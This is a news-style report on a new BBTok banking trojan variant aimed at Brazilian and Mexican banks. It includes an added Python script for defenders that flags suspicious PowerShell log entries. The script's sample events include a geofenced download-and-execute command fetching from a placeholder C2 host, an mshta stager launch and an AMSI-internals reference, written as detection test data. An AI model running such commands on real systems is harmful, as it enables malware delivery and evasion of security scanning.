New BBTok Banking Trojan Variant Hits 40+ Latin American Banks
A fresh strain of the BBTok banking trojan is actively targeting users in Latin America, with a focus on Brazil and Mexico.
This trojan is known for its ability to mimic the interfaces of over 40 banks in these regions and deceive victims into divulging their 2FA codes and payment card details.
Key Takeaways:
- A new variant of the BBTok banking trojan is spreading across Latin America, particularly in Brazil and Mexico.
- BBTok disguises itself by replicating the interfaces of more than 40 banks, tricking users into revealing sensitive banking information.
- The trojan employs phishing emails with diverse file types and uses custom server-side PowerShell scripts to generate unique payloads for each victim.
Stealthy Trojan Targeting Latin America
In a recent discovery, a new strain of the BBTok banking trojan is actively targeting users in Latin America, with a particular focus on Brazil and Mexico.
This trojan is notorious for its ability to replicate the interfaces of over 40 banks in these regions, luring victims into providing their 2FA codes and payment card information.
Custom Payload Generation and Phishing Emails
The attackers behind BBTok employ custom server-side PowerShell scripts to generate distinct payloads for each victim, considering factors like the operating system and country.
They distribute these payloads through phishing emails that utilize various file types, making detection challenging.
Windows-Based Banking Malware
BBTok, which first appeared in 2020, is a Windows-based banking trojan with the feature set typical of the genre.
It can terminate processes, execute remote commands, manipulate keyboard input, and present fake login pages for banks operating in Brazil and Mexico.
Complex Attack Chains
The attack methods used by BBTok are relatively straightforward but effective. They involve deceptive links or ZIP file attachments that quietly deploy the trojan from a remote server.
These attacks are tailored for both Windows 7 and Windows 10 systems, and designed to evade detection mechanisms such as the Antimalware Scan Interface (AMSI).
Geo-Targeting and Evasion Techniques
To stay hidden, BBTok utilizes living-off-the-land binaries (LOLBins) and geofencing checks to ensure that only users in Brazil or Mexico are targeted before delivering the malware via the PowerShell script.
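The delivery chain described in the last few sections (a server-side PowerShell stage that fingerprints OS and country, LOLBin staging, a geofence that gates delivery on Brazil or Mexico, and AMSI evasion) leaves traces in PowerShell script block logging (Windows event ID 4104). The script below is an added illustration of how a defender might triage such log entries; it is not Check Point's code and contains no published BBTok indicators. The indicator lists (LOLBin names, locale checks, the AMSI type names) are generic heuristics chosen by the editor, and the sample events are constructed, with placeholder hostnames.

```python
"""Triage PowerShell script block log entries for the delivery behaviours
described in the article: OS/country fingerprinting, LOLBin staging,
geofenced download-and-execute, and references to AMSI internals.

Added example, not from the original article. Indicator lists are generic
assumptions, not BBTok IoCs. All sample events below are constructed."""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Iterable

# Microsoft-Windows-PowerShell/Operational: script block logging event.
SCRIPT_BLOCK_EVENT_ID = 4104

# Heuristic rules (editor's assumptions). Order matters for the reported list.
RULES = {
    # Living-off-the-land binaries commonly abused as stagers.
    "lolbin_staging": re.compile(
        r"\b(mshta|regsvr32|rundll32|certutil|bitsadmin|msiexec)(\.exe)?\b", re.I),
    # Locale / region lookups or hard-coded BR/MX locale strings (geofencing).
    "geofence_check": re.compile(
        r"(Get-Culture|Get-WinSystemLocale|Get-WinHomeLocation|['\"](BR|MX|pt-BR|es-MX)['\"])", re.I),
    # OS version fingerprinting used to pick a per-victim payload.
    "os_fingerprint": re.compile(
        r"(Win32_OperatingSystem|\[Environment\]::OSVersion|\[System\.Environment\]::OSVersion)", re.I),
    # Fetch-and-run from a remote server.
    "remote_download_exec": re.compile(
        r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\biex\b|Invoke-Expression)", re.I),
    # Any mention of AMSI internals in a script block is suspicious on its own.
    "amsi_reference": re.compile(r"(AmsiUtils|amsiInitFailed|AmsiScanBuffer)", re.I),
}


@dataclass
class Finding:
    record_id: int
    rules: list[str] = field(default_factory=list)
    severity: str = "low"


def classify(rules: Iterable[str]) -> str:
    """Severity: geofence + remote execution (the chain the article describes)
    or AMSI references are high; two or more other hits are medium."""
    hits = set(rules)
    if "amsi_reference" in hits or (
            "geofence_check" in hits and "remote_download_exec" in hits):
        return "high"
    if len(hits) >= 2:
        return "medium"
    return "low"


def triage(events: Iterable[dict]) -> list[Finding]:
    """Run every rule over each 4104 event; other event IDs are ignored."""
    findings: list[Finding] = []
    for ev in events:
        if ev.get("event_id") != SCRIPT_BLOCK_EVENT_ID:
            continue
        text = ev.get("script_text", "")
        matched = [name for name, rx in RULES.items() if rx.search(text)]
        if matched:
            findings.append(Finding(ev["record_id"], matched, classify(matched)))
    return findings


# Constructed sample events (not real telemetry). Hostnames are placeholders.
SAMPLE_EVENTS = [
    {"record_id": 101, "event_id": 4104,  # benign admin housekeeping
     "script_text": "Get-ChildItem C:\\Logs -Recurse | Where-Object { $_.Length -gt 1MB } | Export-Csv big.csv"},
    {"record_id": 102, "event_id": 4104,  # geofenced, OS-aware fetch-and-run
     "script_text": "$loc = (Get-Culture).Name; if ($loc -eq 'pt-BR' -or $loc -eq 'es-MX') { "
                    "$os = (Get-CimInstance Win32_OperatingSystem).Caption; "
                    "IEX ((New-Object Net.WebClient).DownloadString('http://C2-PLACEHOLDER.invalid/' + $os)) }"},
    {"record_id": 103, "event_id": 4103,  # wrong event type: must be skipped
     "script_text": "mshta.exe something"},
    {"record_id": 104, "event_id": 4104,  # lone LOLBin launch
     "script_text": "Start-Process -FilePath mshta.exe -ArgumentList 'http://STAGER-PLACEHOLDER.invalid/f.hta'"},
    {"record_id": 105, "event_id": 4104,  # AMSI internals named in a script block
     "script_text": "$t = 'System.Management.Automation.AmsiUtils'"},
]


def demo() -> list[Finding]:
    return triage(SAMPLE_EVENTS)


if __name__ == "__main__":
    for f in demo():
        print(f"record {f.record_id}: {f.severity:6} {', '.join(f.rules)}")
```

The scoring deliberately treats the combination the article describes (a locale check that gates a download-and-execute) as more significant than any single indicator, since a lone `Get-Culture` or `Invoke-WebRequest` is routine in administrative scripts. Event 4104 only exists if script block logging is enabled, so the first control is turning that logging on.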
Credential Theft and Account Takeovers
Once activated, BBTok establishes connections with a remote server to simulate security verification pages from various banks.
By impersonating Latin American banks’ interfaces, the trojan aims to harvest users’ credentials and authentication information, facilitating account takeovers.
Operator’s Cautious Approach
Interestingly, all banking activities by BBTok are carried out only upon direct command from its command-and-control (C2) server, avoiding automatic execution on every infected system.
Increasing Threat in Latin America
The analysis of BBTok reveals significant improvements in obfuscation and targeting since its emergence in 2020. The inclusion of Spanish and Portuguese in the source code and phishing emails suggests the attackers’ origin.
It is estimated that over 150 users have been infected by BBTok.
Ongoing Threat in the Region
While BBTok has managed to evade detection due to its sophisticated techniques and selective targeting in Mexico and Brazil, it remains an active threat.
Its diverse capabilities and unique delivery methods make it a danger to organizations and individuals in the region.
Conclusion:
The emergence of a new BBTok banking trojan variant highlights the evolving nature of cyber threats, particularly in the Latin American region.
Organizations and individuals should remain vigilant and take necessary precautions to protect against such threats.
About Check Point:
Check Point is a leading cybersecurity company known for its expertise in threat prevention, providing solutions to safeguard organizations against various cyber threats and attacks.